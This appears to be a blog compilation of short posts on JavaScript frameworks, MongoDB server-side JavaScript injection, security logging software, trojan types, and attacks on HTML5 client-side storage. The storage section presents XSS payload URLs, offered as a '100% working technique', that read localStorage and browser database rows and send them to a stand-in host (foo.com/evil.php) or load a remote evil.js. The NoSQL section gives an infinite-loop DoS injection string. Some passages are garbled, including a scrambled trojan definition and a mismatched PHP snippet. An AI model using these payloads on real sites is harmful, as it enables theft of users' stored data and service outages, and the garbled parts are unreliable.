Choosing a JavaScript Framework, the only way ?

Choosing a JavaScript Framework . 

Which JavaScript Framework will be best for you? Let us try to answer what you actually need. Because, in the end, it’s not only about JavaScript Frameworks.

It becomes very difficult for so many people when they try to choose a JavaScript Framework. But I think it’s more about framework vs. libraries. Using a framework may lead to a lock-in where as a library based approach yields more flexibility. Don’t get me wrong. Frameworks are great in that they solve a lot of common concerns. This is just great for prototyping and development up to a point. 

 

 Frameworks Come with Boundaries

 

 The problems begin as you start hitting the boundaries and go beyond what theframework was meant for. As the framework you are using gains new features you’ll likely want to keep your application up to date. This incurs some cost and may lead to bigger refactoring at worst.


Libraries Are More Flexible

 

In a library based approach (say React + some router + some data solution) you can be more flexible. As technologies come and go you can upgrade portions of your application as you want. There’s no need for big upheavals. Instead you set the pace. Say if a better router comes up you can replace that specific portion without having to disrupt the rest of the application.

Both Approaches Are Valid

 

Both approaches have their merits. I don’t expect frameworks to go anywhere. I do believe a library based approach is a little underappreciated at the moment. It does require more legwork and it comes with more technical challenge when you are starting. But the flexibility it yields may just be worth it. But as I said, it depends on the context.

NoSql Injection

JavaScript (server-side) injection vulnerabilities are not limited. NoSQL database engines that process JavaScript containing user-specified parameters can also be vulnerable.  For example, MongoDB supports the use of JavaScript  functions for query specifications etc. Since MongoDB databases do not have strictly defined database schemas, using JavaScript for query syntax allows developers to write complex queries against disparate  document structures. For example,we have a MongoDB collection that contains some documents representing books, some documents representing movies, and some documents representing music albums.  This JavaScript query function  will select all the documents in the specified collection that were either written, filmed, or recorded in the specified time:

function()

{

var search_time = input_value;

return this.publishingTime == search_time ||

this.filmingTime == search_Time ||

this.recordingTime == search_Time;

}

If the application developer were building this application in PHP (for example), the source code might look like this:

$query = ‘function()

{

var search_time = ” .

$_GET[‘time’] . ”;’ .

‘return this.publishingTime == search_Time || ‘ .

this.filmingTime == search_Time || ‘ .

this.recordingTime == search_Time;}’;

$cursor = $collection->find(array(‘$where’ => $query));

This code uses the value of the request parameter “year” as the search
parameter. However, just as in a traditional SQL injection attack, since the query syntax is being constructed in an ad-hoc fashion  (i.e. query syntax concatenated along with user input), this code is vulnerable to a server-side JavaScript
injection attack. For example, this request would be an effective DoS attack against the system:
                  
                      http://server/app.php?year=1995′;while(1);var%20foo=’bar

credits : sql injection attacks and defence.

Some Security Softwares

Most organizations use several types of network-based
and host-based :


security software to detect malicious activity, protect systems and data, and support incident response efforts. Accordingly, security software is a major source of computer security log data. Common types of network-based and host-based security software include the following 

Network Quarantine Servers : Some organizations check each remote host’s security posture before allowing it to join the network. This is often done through a network quarantine server and agents placed on each host. Hosts that do not respond to the server’s checks or that fail the checks are quarantined on a separate virtual local area network segment. Network quarantine servers log information about the status of checks, including which hosts were quarantined and for what reasons.

Routers : Routers may be configured to permit or block certain types of network traffic based on a policy. Routers that block traffic are usually configured to log only the most basic characteristics of blocked activity.

Web Proxies : Web proxies are intermediate hosts through which Web sites are accessed. Web proxies make Web page requests on behalf of users, and they cache copies of retrieved Web pages to make additional accesses to those pages more efficient. Web proxies can also be used to restrict Web access and to add a layer of protection between Web clients and Web servers. Web proxies often keep a record of all URLs accessed through them.

Vulnerability Management Software Vulnerability management software, which includes patch management software and vulnerability assessment software, typically logs the patch installation history and vulnerability status of each host, which includes known vulnerabilities and missing software updates.5 Vulnerability management software may also record additional information about hosts’ configurations. Vulnerability management software typically runs occasionally, not continuously, and is likely to generate large batches of log entries.

Remote Access Software : Remote access is often granted and secured through virtual private networking (VPN). VPN systems typically log successful and failed login attempts, as well as the dates and times each user connected and disconnected, and the amount of data sent and received in each user session. VPN systems that support granular access control, such as many Secure Sockets Layer (SSL) VPNs, may log detailed information about the use of resources.

Antimalware Software : The most common form of antimalware software is antivirus software, which typically records all instances of detected malware, file and system disinfection attempts, and file quarantines. 3 Additionally, antivirus software might also record when malware scans were performed and when antivirus signature or software updates occurred. Antispyware software and other types of antimalware software (e.g., rootkit detectors) are also common sources of security information.

Intrusion Detection and Intrusion Prevention Systems : Intrusion detection and intrusion prevention systems record detailed information on suspicious behavior and detected attacks, as well as any actions intrusion prevention systems performed to stop malicious activity in progress. Some intrusion detection systems, such as file integrity checking software, run periodically instead of continuously, so they generate log entries in batches instead of on an ongoing basis.

Firewalls : Like routers, firewalls permit or block activity based on a policy; however, firewalls use much more sophisticated methods to examine network traffic.6 Firewalls can also track the state of network traffic and perform content inspection. Firewalls tend to have more complex policies and generate more detailed logs of activity than routers.

Authentication Servers : Authentication servers, including directory servers and single sign-on servers, typically log each authentication attempt, including its origin, username, success or failure, and date and time.
 

credits : wikipedia

Network Threat : The Trojan Horse

What is a Trojan Horse ?

A trojan horse is used to enter a victim’s computer, granting the attacker ‘wrapped’ into a program meaning that this program may therefore have hidden fuctions that you are not aware of.
unrestricted access to the data stored on that computer and causing great damage to the victim. A trojan can be a hidden program that runs on your system  without your information,
or it can be

Different types of trojans :

1) FTP torjans : These trojans open an FTP server on the victim’s machine that might store and serve illegal software and/or sensitive data, and allow attackers to connect to your machine via FTP.

2) Destructive trojans : The only function of these trojans is to destroy and delete files. This makes them very simple to use. They can automatically delete all the core system files on your machine. The trojan can either be activated by the attacker or can work like a logic bomb that starts on a specific day and time.
A destructive trojan is a danger to any computer network. In many ways, it is similar to a virus, but thedestructive trojan has been created purposely to attack you, and therefore is unlikely to be detected by your antivirus software.

3) Proxy trojans : These trojans turn the victim’s computer into a proxy server, making it available to the whole world or to the attacker alone. It is used for anonymous Telnet, ICQ, etc., to make purchases with stolen credit cards, and for other such illegal activities. This gives the attacker complete anonymity and the opportunity to do everything from YOUR computer, including the possibility to launch attacks from your network.
 
4) Denial of Servce (DoS) attack trojans : These trojans give the attacker the power to start a Distributed Denial of Service  attack if there are enough victims. The main idea is that if you have 500 infected ADSL users and you attack the victim simultaneously from each, this will generate HEAVY traffic, causing its access to the Internet to shut down.

5) Security software disablers : These are special trojans, designed to stop/kill programs such as antivirus software, firewalls, etc. Once these programs are disabled, the hacker is able to attack your machine more easily.

6) Data-sending trojans : The purpose of these trojans is to send data back to the hacker with information such as passwords (ICQ, IRC, FTP, HTTP) or confidential information such as chat logs, address lists, etc. The trojan could look for specific information in particular locations or it could install a key-logger and simply send all recorded keystrokes to the hacker.



7) Remote access trojans :  These are probably the most publicized trojans, because they provide the attacker with total control of the victim’s machine. Example : Back Orifice trojans. The idea behind them is to give the attacker COMPLETE access to someone’s machine, and therefore full access to files, private conversations, accounting data, etc. Some trojans can also automatically connect to IRC and can be controlled through IRC commands almost anonymously, without the attacker and the victim ever making a real TCP/IP connection.

Another question : How can I get infected ?
Generally, attack are being done through :

1) Infection via attachment ( of course emails : the most common way )

2) Infection by downloading files from a website (another common way )

Now most important thing, how to protect your network from trojans ?

Ok, if you think that anti-viruses are really helpful and they’ll protect your system and network  from trojan attacks, then you are wrong. Anti-viruses just help us to some extent.
To effectively protect your network against trojans, you must follow a multi-level security strategy:

1. You need to implement gateway virus scanning and content checking at the perimeter of your network for email, HTTP and FTP – It is no good having email anti-virus protection, if a user can download a trojan from a website and infect your network.

2. You need to implement multiple virus engines at the gateway – Although a good virus engine usually detects all known viruses, it is a fact that multiple virus engines jointly recognize many more known trojans than a single engine.

3. You need to quarantine/check executables entering your network via email and web/FTP at the gateway. You have to analyze what the executable might do.

4. Do not open unsolicited attachments in email messages.

5. Do not follow unsolicited links.

6. Maintain updated anti-virus software.

7. Use an Internet firewall.

8. Securing your web browser.

9. Keep your system patched.

Good Luck !!

Client-side Storage using HTML5, really secure or just an abuse ?

HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium or chrome to see how this work) Hakcers could steal or modify sensitive data online or offline. If a web application which uses this kind of storage ( client-side ) is vulnerable to XSS attacks we can use an attack payload to read or modify the content of known storage keys on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.

Working technique : ( 100% working technique, i got success while doing this, you just have to use your brain )

Storage Object Enumeration

var ss = “”;
for(i in window.sessionStorage)
{
ss += i + ” “;
}
var ls = “”;
for(i = 0; i < localStorage.length; i++)
 {
ls += localStorage.key(i) + ” “;
 }

Database Object Enumeration

var db = “”;
for(i in window)
{
if(window[i] == “[object Database]”)
{
db += i + “ “;
}
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type=’table’
SELECT sql FROM sqlite_master WHERE name=’table_name’
SELECT sqlite_version()

One Shot Attack :

http://blah_blah.com/page.php?name=<script>document.write(‘<img
src=”http://foo.com/ evil.php?name=’ %2B globalStorage[location.hostname].mykey %2B ‘”>’);</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (“SELECT * FROM client_tb”, [], function(tx, result){ document.write(‘<img src=”http:// foo.com/evil.php?name=’ %2B result.rows.item(0)[‘col_data’] %2B ‘”>’); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js>
</script>


Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations: ( i know only for linux, not a windows user unfortunately :p )

Linux :

/home/$user/.macromedia/Flash_Player/#SharedObjects

Pin It on Pinterest